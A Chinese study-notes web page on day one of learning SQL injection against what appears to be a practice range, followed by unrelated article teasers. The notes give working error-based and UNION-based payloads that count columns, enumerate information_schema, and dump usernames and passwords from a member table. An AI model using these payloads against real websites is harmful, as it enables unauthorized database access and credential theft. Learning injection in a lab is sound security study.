SQL注入第一天
1.报错注入输入单引号后直接显示数据库错误?id1abcde2. 联合查询注入先判断字段数量?id1 ORDER BY 1 ?id1 ORDER BY 2 ?id1 ORDER BY 3 ?id1 ORDER BY 4从正常到报错的临界值可以确定字段数量。例如ORDER BY 4报错通常表示查询有3列。测试回显位置?id-1 UNION SELECT 1,2,3页面显示哪个数字哪个位置就是回显位。在靶场中验证数据库信息(假设是2,3?id-1 UNION SELECT 1,database(),version()知识点MySQL 的information_schemainformation_schemaMySQL 5.0 以上版本自带的系统数据库保存数据库结构信息不直接保存业务数据。information_schema.schemata记录数据库名称。information_schema.tables记录各数据库中的表。information_schema.columns记录各表中的字段。.表示层级关系。例如xiaoxiao.user表示xiaoxiao数据库中的user表。获取数据库基本信息version() -- 数据库版本 database() -- 当前数据库名 user() -- 数据库当前用户 version_compile_os -- 数据库运行系统得出库名为mozhe_Discuz_StormGroup?id1 union select 1,table_name,3,4 from information_schema.tables where table_schemamozhe_Discuz_StormGroup解释where table_schemamozhe_Discuz_StormGroup只筛选出属于mozhe_Discuz_StormGroup这个库的表。?id-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schemamozhe_Discuz_StormGroup为什么要改用group_concat因为union select时如果原始页面只展示结果集的第 1 行数据那么用table_name就只能看到一个表。使用group_concat()可以把所有表名合并到同一行的同一列中这样无论页面只抓取哪一行都能把全部表名带出来信息收集效率更高。得出表之后就查列名?id-1 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_nameStormGroup_member得到列名之后就可以查找敏感字段了账号密码?id1 union select 1, name, password, 4 from stormgroup_member补充?id-1 union select 1, concat(name,0x3a,password), 3, 4 from StormGroup_member order by id limit X,1limit x,1的语法含义在 MySQL 中limit x, 1的含义是跳过前 X 条记录然后只取接下来的 1 条记录。X 从 0 开始limit 0,1代表取第1条limit 1,1代表取第2条limit 2,1代表取第3条……以此类推。

相关新闻

Termux SSH配置全攻略:从密钥登录到设备互联

Termux SSH配置全攻略:从密钥登录到设备互联

1. 从移动终端到云端:为什么Termux的SSH如此重要在移动办公和远程运维越来越普遍的今天,我们早已不满足于只能在桌面电脑上敲命令。想象一下,你正在通勤的地铁上,突然收到服务器告警,或者需要紧急查看一个Git仓库的日志…

2026/7/31 3:43:23阅读更多 →
软件工程期末高效复习:用工程化思维构建知识体系与实战技巧

软件工程期末高效复习:用工程化思维构建知识体系与实战技巧

1. 期末复习的“工程化”思维:从知识罗列到体系构建又到了学期末,看着《软件工程》这本厚厚教材和一堆零散的PPT,是不是感觉无从下手?很多同学复习软件工程,容易陷入一个误区:把复习等同于“背概念”。翻开…

2026/7/31 3:41:22阅读更多 →
MaixCAM与无刷电机云台:嵌入式AI视觉跟踪系统实战

MaixCAM与无刷电机云台:嵌入式AI视觉跟踪系统实战

这次我们来看一个实用的嵌入式视觉项目:MaixCAM 与轮趣无刷电机云台的适配方案。这个组合的核心价值在于将高性能的 AI 视觉处理能力与精准的电机控制结合起来,实现智能跟踪、目标定位等实际应用。MaixCAM 是矽速科技推出的一款基于 RISC-V 架构的高性能…

2026/7/31 3:41:22阅读更多 →
拔掉网线后TCP连接状态变化与检测机制深度解析

拔掉网线后TCP连接状态变化与检测机制深度解析

1. 先搞清楚面试官到底想问什么这个问题看似简单,但90%的候选人会栽在细节理解上。面试官问“拔掉网线后TCP连接是否存在”,其实是在考察三个层面的理解:第一层:TCP协议层面的连接状态如何变化。第二层:操作系统内核中…

2026/7/31 4:51:46阅读更多 →
权限与日志成了大模型新门槛:我的踩坑记录

权限与日志成了大模型新门槛:我的踩坑记录

聊《AI大模型就业怎么选方向?先回答几个现实问题》之前,先说一句实在的:别急着背概念,先看它在真实项目里到底解决什么问题。 摘要 摘要:近期大模型应用从 Demo 转向权限、日志和可观测,这个趋势对普通程…

2026/7/31 4:51:46阅读更多 →
AI写作工具在学术专著创作中的高效应用

AI写作工具在学术专著创作中的高效应用

1. AI写作工具在学术专著创作中的革命性应用当我在2022年第一次尝试用AI工具辅助完成我的第三本专业著作时,那种效率提升的震撼感至今难忘。传统专著写作往往需要耗费学者数月甚至数年的心血,而现在,合理运用AI工具可以将初稿产出时间缩短60%…

2026/7/31 4:51:46阅读更多 →
LangGraph 工作流:为什么 Agent 能跑通却不敢上线?

LangGraph 工作流:为什么 Agent 能跑通却不敢上线?

聊《一次LangGraph项目复盘,问题最后出在流程而不是模型》之前,先说一句实在的:别急着背概念,先看它在真实项目里到底解决什么问题。摘要摘要: 从 Demo 到生产,Agent 应用最危险的环节往往不是模型精度&…

2026/7/31 4:51:46阅读更多 →
STM32串口通信实战:CH340驱动安装、硬件连接与程序下载全攻略

STM32串口通信实战:CH340驱动安装、硬件连接与程序下载全攻略

1. 项目概述:从零开始玩转STM32与CH340串口通信如果你刚拿到一块STM32最小系统板,比如最常见的STM32F103C8T6“蓝色药丸”,第一件事可能就是想着怎么把程序下载进去,或者怎么让板子跟电脑“说上话”。这时候,你大概率会…

2026/7/31 4:51:46阅读更多 →
后端接口挂了,前端怎么继续干活?这个 Chrome 扩展让我再也没等过后端

后端接口挂了,前端怎么继续干活?这个 Chrome 扩展让我再也没等过后端

一个零依赖、纯浏览器的响应改写工具,让你的页面数据随时可控。 你有没有过这样的经历—— 下午三点,后端同事说"接口马上好",你对着浏览器里的 500 干瞪眼。UI 写好了,逻辑写好了,就差数据联调&#xff0c…

2026/7/31 4:49:45阅读更多 →
覆盖国产 + 海外 + 开源模型,OpenClaw 2.7.9 Windows/Mac 双端部署详解

覆盖国产 + 海外 + 开源模型,OpenClaw 2.7.9 Windows/Mac 双端部署详解

🔹 工具基础介绍 OpenClaw 是开源生态中一款实用性较强的本地智能工具,凭借本地离线运行、可视化图形操作和任务自动化三大核心特性,赢得了众多用户的青睐。与普通在线对话AI工具不同,它属于能够直接操控本机软硬件的智能数字员工…

2026/7/30 15:03:16阅读更多 →
伺服阀焊完微漏毁整机?精密激光焊接三关锁住高压

伺服阀焊完微漏毁整机?精密激光焊接三关锁住高压

所谓液压伺服阀体的精密激光焊接,是用激光束对阀座壳体(通常为不锈钢或铝合金)进行密封焊接,使阀体在21-35MPa的高压液压油或压缩气体中长期运行而不发生介质泄漏。液压伺服阀是高端液压系统的"大脑"。从航空航天飞行控…

2026/7/30 12:22:27阅读更多 →
D2DX:三步实现《暗黑破坏神2》高清宽屏体验的终极指南

D2DX:三步实现《暗黑破坏神2》高清宽屏体验的终极指南

D2DX:三步实现《暗黑破坏神2》高清宽屏体验的终极指南 【免费下载链接】d2dx D2DX is a complete solution to make Diablo II run well on modern PCs, with high fps and better resolutions. 项目地址: https://gitcode.com/gh_mirrors/d2/d2dx 你是否还在…

2026/7/30 15:13:02阅读更多 →
物理复制比逻辑复制好在哪?数据库复制原理详解

物理复制比逻辑复制好在哪?数据库复制原理详解

数据库复制是把主库数据同步到备库的机制,分为逻辑复制和物理复制两种。逻辑复制传输的是 SQL 语句或行变更事件,物理复制传输的是存储引擎底层的物理日志。阿里云 PolarDB(云原生数据库)采用物理复制,在同步延迟、数据…

2026/7/31 0:00:40阅读更多 →
BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南

BilibiliDown:3分钟学会B站视频下载的终极指南 【免费下载链接】BilibiliDown (GUI-多平台支持) B站 哔哩哔哩 视频下载器。支持稍后再看、收藏夹、UP主视频批量下载|Bilibili Video Downloader 😳 项目地址: https://gitcode.com/gh_mirrors/bi/Bilib…

2026/7/31 0:00:41阅读更多 →
有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

有哪些游戏数据AI平台?游戏行业Data+AI融合方案盘点

当前,游戏行业的“DataAI融合”已从概念验证进入价值落地阶段。根据IDC 2025年数据,中国AI游戏云市场规模已达18.6亿元;同时,游戏研发环节AI渗透率高达86%,生成式AI内容普及率超过50%。面对庞大的市场,游戏…

2026/7/31 0:00:41阅读更多 →
YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

YOLOv8推理性能优化:从1.2FPS到35FPS的全链路加速实践

如果你在部署 YOLOv8 时,发现推理速度只有可怜的 1-2 FPS,而别人的演示视频却能跑到 30 FPS 以上,那么问题很可能不在模型本身,而在于你的整个处理链路。很多开发者拿到一个训练好的 YOLOv8 模型后,会直接使用官方示例…

2026/7/31 0:49:33阅读更多 →
Coze与Dify对比指南:低代码AI应用开发从入门到实战

Coze与Dify对比指南:低代码AI应用开发从入门到实战

1. 从零到一:为什么你需要了解 Coze 和 Dify?如果你对 AI 应用开发感兴趣,但一看到“大模型”、“智能体”、“工作流”这些词就头疼,觉得门槛太高,那这篇文章就是为你准备的。很多开发者,包括我自己&#…

2026/7/30 4:47:18阅读更多 →
AI生图工具怎么选?2026年6月版实测对比

AI生图工具怎么选?2026年6月版实测对比

做自媒体的朋友应该都有体会:配图一直是个让人头疼的问题。2026年,AI生图工具已经非常成熟了,但工具太多反而不知道怎么选。以下是截至2026年6月我对主流AI生图工具的实测对比。Midjourney V8.1:速度之王2026年6月11日&#xff0c…

2026/7/30 15:43:46阅读更多 →